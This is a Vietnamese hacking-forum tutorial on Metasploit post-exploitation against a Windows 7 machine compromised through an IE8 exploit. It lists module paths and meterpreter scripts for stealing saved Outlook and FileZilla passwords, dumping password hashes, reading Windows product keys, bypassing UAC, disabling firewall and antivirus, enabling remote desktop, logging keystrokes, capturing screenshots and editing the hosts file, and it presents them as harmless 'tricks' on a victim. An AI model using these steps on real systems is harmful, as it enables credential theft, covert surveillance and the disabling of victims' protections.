Ở ví dụ này mình sẽ demo 1 số trường hợp mình thích.
Đầu tiên bắt buộc phải exploit được máy victim để khởi tạo session
Attacker: Backtrack 5r2Cái này tính post hồi trưa mà mới chụp đc cái đầu bị bắt xuốc ăn cơm nên đưng hỏi tại sao mấy cái ảnh khác nhau:
Victim : Window 7 with IE8
Exploit: ms11_003_ie_css_import
Và giờ là tiến hành gather info
1. Gather installed application (enum_application)
2. Usb History (usb_history)
3. Get window serial key (enum_ms_product_keys)
use post/windows/wlan/wlan_current_connection
5. Disconnect wifi đang sử dụng
use post/windows/wlan/wlan_disconnect
6. Xem tất cả wifi đang trong vùng phủ sóng
use post/windows/wlan/wlan_bss_list
7. Xem pass saved của 1 số ứng dụng phổ biến
+outlook:post/windows/gather/credentials/outlook
+filezilla:use post/multi/gather/filezilla_client_cred
Thật sự là muốn làm demo wifi lắm mà máy ảo mình k attach wifi card đc
Và 1 số trò hay với meterpreter, tuy nhiên mình khuyến cáo nên bypass UAC cho trường hợp win 7 với bypassuac (exploit/windows/local/bypassuac)
1. Getcountermeasure (script tự động disable nhiều thứ linh tinh như firewall, av, etc)
2. Enable remote desktop với getgui
Xem thêm ở http://www.offensive-security.com/me...Remote_Desktop
3. Winenum (script tự động dump hash, thông tin khá phong phú)
4. Getlocalsubnet và killav
5. 1 số cái khác > cú pháp chạy run "tên script"
+ hostedit (edit file host victim)
+ screenspy (chụp ảnh màn hình victim với thiết lập time -t "số giây")
+ Keylogrecorder (keylogger)
+ Credcollect (dump hash user, có thể dùng john the riper để crack)
+ blah blah (các bạn có thể xem ở google)
Tổng kết:
Đây chỉ là 1 số trò nghịch khá an toàn khi k muốn phá hoại victim, còn rất nhiều script hay các bạn nên tham khảo thêm ở các site như rapid7 hay offensive-security,... Google.
Nguồn: XgR (Biên tập lại bởi Juno_okyo).